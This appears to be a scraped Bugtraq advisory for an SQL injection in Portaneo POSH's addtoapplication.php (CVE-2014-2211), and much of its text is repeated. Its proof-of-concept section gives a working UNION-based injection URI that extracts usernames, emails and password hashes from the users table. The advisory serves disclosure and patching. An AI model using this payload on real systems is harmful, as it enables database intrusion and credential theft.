POSH 'addtoapplication.php' SQL Injection Vulnerability
BID:65817
Info
POSH 'addtoapplication.php' SQL Injection Vulnerability
| Bugtraq ID: | 65817 |
| Class: | Input Validation Error |
| CVE: |
CVE-2014-2211 |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 26 2014 12:00AM |
| Updated: | Feb 27 2014 10:31AM |
| Credit: | Anthony BAUBE, Damien CAUQUIL |
| Vulnerable: |
Portaneo POSH 3.1.2 Portaneo POSH 3.1.1 |
| Not Vulnerable: | |
Discussion
POSH 'addtoapplication.php' SQL Injection Vulnerability
POSH is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Versions prior to POSH 3.3.0 are vulnerable.
POSH is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Versions prior to POSH 3.3.0 are vulnerable.
Exploit / POC
POSH 'addtoapplication.php' SQL Injection Vulnerability
Attacker can exploit this issue with a browser.
The following example URI is available:
http://www.example.com/portal/addtoapplication.php?pid=0&rssurl=url,nbvariables,defvar%20FROM%20dir_item,dir_cat_item
%20WHERE%201=0%20UNION%20SELECT%201,2,3,4,5,6,(select%20group_concat(username,':',email,':',md5pass)%20from%20users),8%23
Attacker can exploit this issue with a browser.
The following example URI is available:
http://www.example.com/portal/addtoapplication.php?pid=0&rssurl=url,nbvariables,defvar%20FROM%20dir_item,dir_cat_item
%20WHERE%201=0%20UNION%20SELECT%201,2,3,4,5,6,(select%20group_concat(username,':',email,':',md5pass)%20from%20users),8%23
Solution / Fix
POSH 'addtoapplication.php' SQL Injection Vulnerability
Solution:
Updates are available. Please see the references or vendor advisory for more information.
Solution:
Updates are available. Please see the references or vendor advisory for more information.